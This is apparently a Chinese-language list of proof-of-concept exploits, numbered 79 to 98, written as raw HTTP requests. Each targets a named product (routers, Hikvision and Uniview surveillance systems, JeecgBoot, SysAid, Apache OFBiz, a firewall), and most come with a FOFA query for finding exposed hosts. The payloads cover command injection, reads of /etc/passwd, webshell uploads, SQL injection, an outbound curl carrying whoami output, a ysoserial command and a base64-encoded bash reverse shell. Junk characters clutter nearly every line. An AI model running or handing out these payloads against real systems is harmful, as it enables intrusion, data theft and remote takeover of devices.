6 Y+ N8 q2 C( O/ ?2 b: J' u4 g/ P5 l; F, U
: w$ ?6 g( k+ m; d x1 o' u79. BYTEVALUE 百为流控路由器远程命令执行
0 K2 b; J! g3 ^; D6 N# E4 f! RFOFA:BYTEVALUE 智能流控路由器5 s, F @, D1 U! X# e+ @
GET /goform/webRead/open/?path=|id HTTP/1.1* u* r( |+ I6 J! J, [+ Y
Host:IP7 k$ A `9 t8 n; h) S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
2 I) t5 ^! a5 c1 ]+ x9 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; u& W6 G3 U+ m! _' m" C9 ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 Z/ G, {$ E) k: a: nAccept-Encoding: gzip, deflate
! `& R- I" {4 o' E+ t- ?1 d4 GConnection: close% E5 Q% F% G7 F+ [8 m
Upgrade-Insecure-Requests: 1
( X `' r) U/ Q
# L- F! D8 {5 ^6 C! I! A$ p0 z F
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
$ M9 T9 f+ z1 t& c' E6 [& u+ x$ v# _FOFA:app="速达软件-公司产品"
! v% P6 c0 w8 {8 l3 _, JPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
! z2 r' z+ L% z1 uHost: x.x.x.x
, I5 ^) x2 K' m: y% TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; j, g: T$ C5 F( r6 |Content-Length: 27
' V9 q* _- ?& \& A% G, ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 n; g8 [. x/ x- k# n" G( rAccept-Encoding: gzip, deflate
: X% o4 I( [% x2 w/ SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ s7 B8 G, t y7 V
Connection: close
8 y% n% h/ X8 o, N5 \! S! JContent-Type: application/octet-stream$ f& L# n2 P2 F/ s! S5 R! J' j
Upgrade-Insecure-Requests: 1
x- p! y, Q3 p5 a% y3 E4 E! h$ Y, r9 ~$ x
<% out.print("oessqeonylzaf");%>! b8 n$ W o; v6 s; T1 ?
$ J: V8 P: u# Z* d6 O1 E6 T& X
6 P1 \- E, e Q% J
GET /xykqmfxpoas.jsp HTTP/1.1% x5 [4 D' S8 M/ g$ ]: L! J
Host: x.x.x.x5 V0 O' G- a' @7 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 h( [3 r$ g/ @3 e- X' o/ R
Connection: close
% w& M5 l! w, a! D; RAccept-Encoding: gzip/ I! v" v" ?. @9 ]
9 b/ ~- N( p* ^7 w
5 l) H) \1 x* w1 d& n# @; e81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露# V' m; ?/ n% p& U% G3 v- y
FOFA:app="uniview-视频监控"8 L) I0 b3 m2 }; B
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
: D1 @9 m+ C$ C( l: mHost: x.x.x.x
- T2 G& ?% B& e; ]! t' K( fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( p- U ^( H0 H1 T) @$ vConnection: close
! R, v4 W& Q7 i3 R) t6 n: SAccept-Encoding: gzip
# A/ _; r% K# |
, y+ c5 H- {9 O7 |4 f
& n' a3 v. c4 j2 M) V82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行 x5 p( a( C8 U' b* s" b: t# e9 q
FOFA:app="思福迪-LOGBASE"6 O% t. Y! f8 G- F1 u
POST /bhost/test_qrcode_b HTTP/1.1
, {. U& `& Z6 x3 ^8 I% qHost: BaseURL% r! v0 a3 m/ R- l" o- Q
User-Agent: Go-http-client/1.1! p3 M! E- \6 r( `& l+ n
Content-Length: 23
; x% [7 m4 C# v( X. `4 mAccept-Encoding: gzip
# u' h n5 V! X6 x0 q- e9 ZConnection: close& m8 w* L" x# h8 {3 Q
Content-Type: application/x-www-form-urlencoded
( k" ~/ ?0 C3 X4 o: |- K7 {; ]Referer: BaseURL
" F# g! D5 ~: M) |
; u, h2 K- u9 dz1=1&z2="|id;"&z3=bhost
( E/ F, e; y- D; d' G0 q# G" M5 B) U1 \: l2 n# \% I- f
( _ a) J; H1 r: {2 P4 V+ D83. JeecgBoot testConnection 远程命令执行
6 ~4 ~+ ~8 t# {3 J! B! [FOFA:title=="JeecgBoot 企业级低代码平台"
5 M% q! t$ m0 E+ Z6 {* r% q; z6 ?2 o8 L' L0 \3 T
8 D3 J7 z7 D7 v. @" o: u8 n
POST /jmreport/testConnection HTTP/1.1
& k5 @' Y$ b z: ?5 t+ aHost: x.x.x.x
" t9 b5 T1 ?7 R8 | U% eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( m$ k+ D+ j4 Q3 C
Connection: close1 R8 h8 F O% I- C
Content-Length: 8881. b: C. A! `/ U
Accept-Encoding: gzip7 W' R0 H" @+ H% U2 v8 e
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
, C# J4 b# k$ m: VContent-Type: application/json
# k7 ^5 d, p9 T: G( H1 Y
9 g4 H% h* y* ^# fPAYLOAD
' f r( c W' F8 r* S& C L
4 D; |4 @7 ?: W; b# V84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
. T# `4 V6 c. q$ H% \& q: vFOFA:title=="JeecgBoot 企业级低代码平台": V3 h+ A6 O! e/ `1 d, M% \9 C
, b* f% t. J1 O+ l( l) p5 K& G" g) u0 u2 z: m% r# U
6 k# U: t" ]. \" ^- x$ V( GPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.11 `* z) g5 f3 n% u1 n
Host: 192.168.40.130:80805 D* X( g7 k8 h- m( v/ \: k
User-Agent: curl/7.88.1( Y! y2 i7 E& R1 d4 u; \* n
Content-Length: 156
: \. N% S1 j+ D# EAccept: */*4 j/ j" Z. a/ f9 _- R
Connection: close
4 V) ?/ n7 A B8 vContent-Type: application/json
$ ]% U- d% m5 Q( f2 pAccept-Encoding: gzip
& Z! b9 w2 g! p9 y& _+ \* s4 X ~/ T, h: d% _! d
{; D( F+ Q9 k _
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",- L4 t' M2 h; P/ q
"type": "0"+ r1 ^! T! W+ M% }" q7 H2 E2 e5 z
}
; D e) C ]2 g* m/ @8 V1 t
2 T( J7 F5 p3 D; C) Q* B
* b; {9 ?0 @2 t7 u( l$ I85. SysAid On-premise< 23.3.36远程代码执行
0 m9 L7 M; N/ ] `# v# kCVE-2023-47246# S K* B, e, s' X& \1 a
FOFA:body="sysaid-logo-dark-green.png" 5 Z* y' X' Y3 f( k, |4 G; N
EXP数据包如下,注入哥斯拉马
$ H4 o/ q% o- T9 ePOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1) \. r4 @& q0 i, G* |
Host: x.x.x.x
0 M! R3 g/ p/ {, p" S' U5 ^- ~5 }& f2 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 d$ `: P3 l/ j8 a
Content-Type: application/octet-stream/ [9 Q% F7 e5 W' E
Accept-Encoding: gzip
* s/ t+ N' C0 e! c; ~ I" g4 r' F% {' L1 t: T, b4 E% S& A7 I3 `$ `
PAYLOAD9 g" l2 ?4 s' U( d/ Q. Q \- V+ x
& B5 W3 G7 d# S% g6 x" m回显URL:http://x.x.x.x/userfiles/index.jsp9 v8 T' i. S2 R9 b. l
- ~4 B5 |6 N" E0 }1 N2 g9 p, I+ [
86. 日本tosei自助洗衣机RCE9 w2 F" I) C% ^* d1 Q. a. j! ^
FOFA:body="tosei_login_check.php"3 Q2 T# x3 N6 o# p
POST /cgi-bin/network_test.php HTTP/1.1
" y" d7 L8 R2 V* @( m9 sHost: x.x.x.x" Q1 U* @2 e* {
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36! ]# ~' f$ L) R8 M L; H* s
Connection: close
% X& m2 f# T/ Y6 ]8 V9 T6 c7 YContent-Length: 44% \* [8 E9 m! j6 |: J
Accept: */*
: H, g/ a# n! x Q) E {" GAccept-Encoding: gzip
7 ?: G6 e! h) V, gAccept-Language: en
* A* J8 R! U# B! v6 aContent-Type: application/x-www-form-urlencoded6 d' t3 q2 E) `4 e
$ S- k% T' g% ]5 W9 [3 Q4 L" ?
host=%0acat${IFS}/etc/passwd%0a&command=ping
% f3 g; C) O w G+ C* Z6 D. V( l! s6 r( l" i8 G& _/ u! @
1 r/ w/ f$ j6 a0 }; w, P' m! o$ Y
87. 安恒明御安全网关aaa_local_web_preview文件上传4 R" b: G" E* ]6 F* A# K& x
FOFA:title="明御安全网关"
' Z e/ ?" J! t( z) y* i( _ M* e# U0 {POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1/ e5 L3 i7 w. v; s0 Z* z
Host: X.X.X.X
0 o# `4 c6 J/ k7 U: |3 r1 c1 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" A0 \7 j& ^# m6 O1 N4 M5 S
Connection: close9 @" ^5 L% w! U. E4 r4 k& w
Content-Length: 198
" @3 A, N0 H! ?) MAccept-Encoding: gzip
. e# `, n# z3 S& p# OContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd% F, f; t7 \8 D9 u, O: [# I0 c
! W* m$ y# B9 z f--qqobiandqgawlxodfiisporjwravxtvd
% Z2 Q& h% s2 ^6 _( R1 kContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
. L2 q& X3 }2 \" E9 k4 v! V/ E ^2 P+ sContent-Type: text/plain$ m+ V; f- j O, Y' N' }* I8 |
# n5 p* Z# [( H" n6 T. d1 g2 b2ZqGNnsjzzU2GBBPyd8AIA7QlDq- U! D8 y+ K9 i% e2 {
--qqobiandqgawlxodfiisporjwravxtvd--
( @ K+ m3 g2 z& p8 m( p% t) d& w0 k2 v. H: v5 A
+ J: W+ Q6 o1 I4 e
/jfhatuwe.php6 Q8 }# M+ p; n, J4 n, N9 o$ J
; o. w1 k7 r# a4 |3 Q) ~3 e" k! u
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行* v2 F' a% {. z. Y# z; X" M
FOFA:title="明御安全网关"
0 h6 B0 Z0 `: g$ Z' p7 Q0 D7 ~GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
% s$ R9 O/ S' z H- F0 k$ L, E/ G3 ^Host: x.x.x.xx.x.x.x1 G" R- B& s3 u# r! V0 _, \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 n3 H2 S, |1 R1 u" xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 b9 o _" Y' O# M1 ^Accept-Encoding: gzip, deflate: `- K/ f) l, I: t2 `5 p: z# ]; R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 H+ U* l) c# GConnection: close$ n P( j% h: v* j q
P/ K) E0 j/ n, T9 t1 N8 B: o# D! U9 S( m. d3 @! ] i1 ?9 h# \# ?1 X' M
/astdfkhl.php
# Z% Z9 @" i" ?5 z# x0 e9 y
# X: O: {7 B2 b) C7 a' }- A$ ^89. 致远互联FE协作办公平台editflow_manager存在sql注入0 M* W, I- D$ ]$ L
FOFA:title="FE协作办公平台" || body="li_plugins_download"
1 S* _+ B9 C: ePOST /sysform/003/editflow_manager.js%70 HTTP/1.1
7 C0 ~& u9 k J2 ]+ b5 THost: x.x.x.x
- s. ^0 I: D* i# _- t9 v5 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* h7 m- ]2 v4 P! W/ T2 y WConnection: close
) p W; T l8 Q: L5 J' H8 bContent-Length: 41 {3 o V8 H* k/ z* r p
Content-Type: application/x-www-form-urlencoded# J4 H) x$ K& g `0 ^' ]
Accept-Encoding: gzip$ `3 }5 z m7 B$ c8 d% k
1 X! Z8 X$ ~5 p: ^5 R
option=2&GUID=-1'+union+select+111*222--+
6 z7 R S* K+ _4 u+ N2 U5 R V8 V R6 F, q& d# o
+ F h9 F6 O- G" G5 x90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
. d! J( O- u. B3 q+ fFOFA:icon_hash="-1830859634"
( g/ }& S8 U7 c( Y( A% \9 K, sPOST /php/ping.php HTTP/1.15 g( m1 u( F f" @, |# I, B% \
Host: x.x.x.x
% A8 _! n- r& X& m, W5 I+ E# \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
! m' ^* K; Y# |- b) AContent-Length: 51- ^7 X. s9 b0 u
Accept: application/json, text/javascript, */*; q=0.01
/ }3 n# R* z) u& T) z4 g# pAccept-Encoding: gzip, deflate
2 F& l% M4 `3 ^7 q2 t: @( TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, s$ o; N+ d& N. w, t2 N/ IConnection: close
) {6 `9 x0 X3 t7 L l% hContent-Type: application/x-www-form-urlencoded
$ g7 B6 s U$ rX-Requested-With: XMLHttpRequest' ]- s" E# h5 v% m# r$ I
" ?/ n8 f7 E8 F- ~0 b$ }' P
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig0 o9 i' ~) s( g1 ]4 z7 L7 N* Z
+ U9 p6 |) v% a; G% R% x5 I% W+ ~) F: G' f# {0 O# g. r4 E
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
% Q$ f, m$ L0 F% k' E/ h6 hFOFA:title="综合安防管理平台"( Y0 X: Q' V3 G9 C h0 e
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
# q$ e' R d. k& {( k8 r, G; {Host: your-ip m- ] t( v/ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
6 V2 q/ d5 r0 o, u$ B' _: S: xAccept-Encoding: gzip, deflate
/ }0 F$ S4 j7 P. {% X2 ^Accept: */*- j9 ~1 m+ X$ x% z( `* i
Connection: keep-alive
* n' [3 ~% ^ E: }% K% I$ C; Z, K' R3 k% P1 y" E' t
$ j% I; r! L V# Z! G7 G& T
# ]) l8 h* `8 f% i
92. 海康威视运行管理中心session命令执行& L5 g' s# A& ^, }
Fastjson命令执行, l& k6 |6 I1 u: c) x
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76", @+ U7 s* F/ [( R8 p6 [! f4 R
POST /center/api/session HTTP/1.1
8 H6 q7 S/ F; V3 hHost:
; n" m$ V. M, H: @Accept: application/json, text/plain, */*" Q$ X" O2 K( Y* I- y6 m1 A+ k
Accept-Encoding: gzip, deflate
0 g3 E+ L3 g/ V Z* o( l: dX-Requested-With: XMLHttpRequest% d4 c% |4 y- z" t1 t' o
Content-Type: application/json;charset=UTF-8. L$ A, W6 f, P- m) L: |, H+ p0 C
X-Language-Type: zh_CN
3 l8 V$ a# G8 K) s+ yTestcmd: echo test8 R: C9 J9 X: @( m$ T! K5 _* U' w* y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36+ I- R% ?, M2 d# \* m
Accept-Language: zh-CN,zh;q=0.9+ P! _: k9 O" x- K( O# u
Content-Length: 5778
# x7 x4 V8 K' c( e: L! o I5 @
5 L5 R6 E' e7 M' D; V6 jPAYLOAD
$ f& W2 e6 E& ~9 a1 W8 @- b) J% e: V3 d( G2 m6 g
1 _2 O! N) g. C k8 x
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
+ T3 E2 B5 v ~. n/ w' ~2 Q) ZFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
- s+ O2 R8 A* B H, n2 d IPOST /?g=app_av_import_save HTTP/1.1
; X, z3 a" m% @8 B( D7 V3 h* }Host: x.x.x.x
' V2 K) R5 q) r* i/ [Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx! Q: P- c! J+ b3 p/ T; d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 O2 J$ L3 |" S Q8 t2 l2 {1 C/ \% M
------WebKitFormBoundarykcbkgdfx2 r, L" }: y% Q1 @) O m1 v
Content-Disposition: form-data; name="MAX_FILE_SIZE"
- l6 }, T+ n ~+ g t
( }" I4 ?2 E& e6 }6 a100000005 B8 i T4 R* q2 o4 V
------WebKitFormBoundarykcbkgdfx
4 Y% i+ k. k7 r2 s$ lContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
; C, ~& f: C( M# u! l6 [9 Q& x; ?Content-Type: text/plain
6 N5 \* L$ [3 C9 g6 m7 }
$ x0 N% @ O! u& K* E8 Nwagletqrkwrddkthtulxsqrphulnknxa) G4 ?; f; s+ H* ^/ V
------WebKitFormBoundarykcbkgdfx8 }/ ~9 r0 f' F8 S
Content-Disposition: form-data; name="submit_post"$ v4 ^2 e5 \+ k' x1 F( u
# c! _# B: b+ g
obj_app_upfile
8 E, O" t. i; B; w! C# K------WebKitFormBoundarykcbkgdfx
- k4 y. c# _8 ~6 AContent-Disposition: form-data; name="__hash__"
r* y F) d1 I6 w% I
* K/ K. T+ x) n6 q) z, s, P0b9d6b1ab7479ab69d9f71b05e0e9445
* i2 g! F3 O: g& i------WebKitFormBoundarykcbkgdfx--
3 M- _% M5 l/ {, V% z' O! j7 o( t0 |2 ]+ w' D4 L# k
9 n7 ?! r, H* `9 i3 r) }/ e, ?2 BGET /attachements/xlskxknxa.txt HTTP/1.1: }! S6 } H+ g U- a* r' J% T/ Z
Host: xx.xx.xx.xx( x0 N/ l2 h5 G z. |: D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- C7 l; R9 l' i/ x& M5 o
" u- ~: X0 W3 m" X
/ D6 _ G* c* m, V/ V, R: U94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
. O& G: t4 v. B" ]) SFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="% E7 k$ t# e* p. Y
POST /?g=obj_area_import_save HTTP/1.1
/ \7 m" h! F' |/ ?. o! QHost: x.x.x.x" k! [( y8 F! d- G; s; c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt; l( E; D# \/ D$ N& ^9 i" [# S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 e h2 {5 T* L1 D7 {* j8 ^8 V1 y$ l& H3 {) ~, @
------WebKitFormBoundarybqvzqvmt
' G* f4 }$ T) O5 kContent-Disposition: form-data; name="MAX_FILE_SIZE"4 e6 }, a7 {: a( Z5 ~6 M/ c
& V9 c6 w2 {/ c; L9 g
10000000
H5 W! A$ C" p/ _* C( f------WebKitFormBoundarybqvzqvmt2 D' e+ P2 M. `+ t- Y# ]/ j
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"; S# t( v. Q- y0 h
Content-Type: text/plain
- k; H c/ h( j; m) v( q& J1 l
3 {- D; m( K7 a# b G- d' wpxplitttsrjnyoafavcajwkvhxindhmu9 P& q0 |$ \6 B5 [% r6 w1 z( S. z& Y
------WebKitFormBoundarybqvzqvmt5 @$ `& O3 w% f* N. |. u, G
Content-Disposition: form-data; name="submit_post"2 ^6 ] x- ?4 J
- g. {+ ?( c, E9 {% v7 i. X4 vobj_app_upfile
& r" F& c) r. o2 b$ z3 r3 b0 b------WebKitFormBoundarybqvzqvmt
* t. E" q1 Q5 l# j. M* qContent-Disposition: form-data; name="__hash__"" @2 Z7 ~$ w' O( a/ D$ z6 E: Q
8 n/ a4 B) t4 b+ l& U
0b9d6b1ab7479ab69d9f71b05e0e9445
% c% U+ ^2 \+ U9 f* B9 H4 k" {------WebKitFormBoundarybqvzqvmt--! u3 Q$ K: n: P0 \9 |. {
2 ?9 M" ^$ d5 {- |$ ~" i
; f2 X \3 F+ \
5 [. r# y+ s, G! IGET /attachements/xlskxknxa.txt HTTP/1.18 ~% J+ D; E. g1 i0 G# ^4 ]. D: o
Host: xx.xx.xx.xx
, I* f7 y5 \$ |5 S: X sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) C* v( K( g$ L4 P: t4 P: f6 Q$ G: p; X( r
* N2 s0 t5 g4 W- u! I) A" O" ?, y @( e# h0 H
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行9 K" K' s* A( L9 q. N( Z
CVE-2023-49070- Y1 T5 {3 N% z7 r; p/ B, r$ s5 ^: y
FOFA:app="Apache_OFBiz", {4 M9 u. N5 i; a+ X/ _: ^
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1% k- P& v7 o5 W4 j6 i u X
Host: x.x.x.x) o# X+ G6 X. m) \! @ P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! f: n. k% R, Z1 F
Connection: close& v( m0 t+ F8 x
Content-Length: 889
5 g# k& q/ I/ @0 r6 c x8 Q6 WContent-Type: application/xml2 t* r% w6 j4 ]: w4 V, e3 E- k
Accept-Encoding: gzip) j6 x; A/ p- t! ?$ k/ X- `2 @1 q
1 E6 j" I8 F F( T3 X+ h
<?xml version="1.0"?>( v! ]1 Q) e8 P- }5 ?0 G
<methodCall>
, B* X* d- S8 _2 B. M <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>/ @7 d6 P0 l2 n+ k3 V' m3 w
<params>
+ o ~- u* f1 R; w' { <param>
- Q; n, l; ~$ _ <value>
4 Z7 o7 q7 v' N+ i <struct>
1 A9 V) w3 U) V <member>- E2 k7 A5 A. w7 z" Z
<name>test</name>3 ~! n, X: \6 e( }
<value>! z3 @" q; h! ]$ l* `
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>7 s$ m2 N! k8 R7 ?. b
</value>% R( e, m! Q# }1 A* @
</member>
3 O% O( [- S7 q </struct>
p0 z( Y8 _8 x* z3 ` </value>
4 ?4 t" u: s. }+ J7 z5 I+ w </param>5 @$ L7 Q% Q* A: Z9 m
</params>
" O+ S/ F. p; ?</methodCall>
' V, {2 o% k- o( e6 l' w+ }5 o1 v* j& G* {+ T" _! b* w* e% C
( m' T" O/ Y9 v5 q! e! T用ysoserial生成payload+ w4 [+ U5 l2 f. q% J
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"5 x1 G: \7 f' z9 x% Z) z& f# P
$ U0 j0 b" N+ j7 d# r
! E: T5 O) @# `5 B6 T9 k将生成的payload替换到上面的POC
; Q: f r; t% j( w% m5 p; nPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1. g0 P# k+ p+ y# b) r, j
Host: 192.168.40.130:8443+ J* W, A" Y4 k7 `9 g; m/ i$ H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36; M$ L8 X& y/ i+ H& {! y
Connection: close
: T, c0 W6 `' U) d! b2 n/ g% vContent-Length: 889 j, `0 L& s. Y/ G) k
Content-Type: application/xml1 N0 T- K% o1 l! Z
Accept-Encoding: gzip
7 @9 J1 M6 o& w' V* `- }/ S4 Q
$ R1 ], }& k( S9 APAYLOAD" R6 x9 h$ o( x! |; V- F- Q2 a
% v0 N0 H6 Y3 N6 A6 F. }% \7 Z) ]. |
96. Apache OFBiz 18.12.11 groovy 远程代码执行& v+ {/ Q( q8 `, ]' s4 P
FOFA:app="Apache_OFBiz": E. Q$ ~/ H0 |% n$ s0 d
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1, H. t- X1 N. v
Host: localhost:8443
8 @* @' U f. {$ S$ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 a. U4 _' N" m, ^: pAccept: */*
0 A& O: S. q) j oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: ]1 s/ @7 G" J# V; o4 v2 kContent-Type: application/x-www-form-urlencoded, [; G! g; f3 S6 j* c b. e
Content-Length: 55% |5 r2 y0 }. S4 X
1 k* Z" N! f+ P" o: E0 ?( y4 W
groovyProgram=throw+new+Exception('id'.execute().text);/ m! z& @! l& k) \) H
0 K' T$ w$ p3 Q4 r5 [' v. `0 `/ z, m+ q, ~% P* ]0 o# Y5 x
反弹shell4 f" I* a- P* r: V" H5 g
在kali上启动一个监听, h- v1 ?* H% T' y2 `8 i# K
nc -lvp 77776 B+ r B9 w6 E) a. X. K
0 k, [/ Q, l/ g2 F; y/ m& oPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
. s' z1 ?/ ^9 \$ [. Q& GHost: 192.168.40.130:8443
2 G7 @7 u: F. ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 l0 F& O' _# KAccept: */*- o5 z- p# P& J1 J8 q1 f4 E1 M* x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# }; s$ b6 d- ]& q- ^3 J
Content-Type: application/x-www-form-urlencoded
" d1 Y q8 c( p) g5 H, V% WContent-Length: 71
5 {% J! S- P) e$ o
6 s2 a6 B9 @' F- c- t+ D: d/ vgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();8 M# A* r5 j5 V! `: d' p) ]5 O
) A, Y# g+ X5 ?( h# @1 D, v
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行. _& q$ M4 J& T, ^$ }
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
' j0 E6 C% u& Z: B! {GET /passport/login/ HTTP/1.1
9 Q' x; y U: h4 E/ t0 @, |& f% ?Host: 192.168.40.130:8085
" V1 b* E0 H7 B; C1 gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ r6 ^0 E" b4 ^, e" R# w
Accept-Encoding: gzip6 e5 T! A5 }+ B# @! T H" s6 T3 p
Connection: close
0 T F' D! b3 l. P: g/ i; @Cookie: rememberMe=PAYLOAD
! A) z# B: v; D: rX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
: `+ T$ t9 E; h& b
$ V! K1 F- L% F* }( n, w5 D' G: n
, f4 m u1 {' |, `$ }, G98. SpiderFlow爬虫平台远程命令执行( v5 |+ _5 h+ ?9 B! P. @' X3 Q0 u
CVE-2024-0195( [- d! L# g' s G( a2 n
FOFA:app="SpiderFlow" E+ u* M( K, M" o K: o0 Y# w
POST /function/save HTTP/1.1
: }& L) Y1 r THost: 192.168.40.130:80886 Q7 \2 G4 t: a) S8 k5 b S1 x3 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 M1 f; K7 \) R- F# K1 sConnection: close
1 ~) |! ^. s3 w& M% r5 [3 tContent-Length: 1216 u0 }( b: {7 T$ |+ D
Accept: */*8 t( g3 Z7 A" k- N: a
Accept-Encoding: gzip, deflate1 X4 d! X6 e! w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
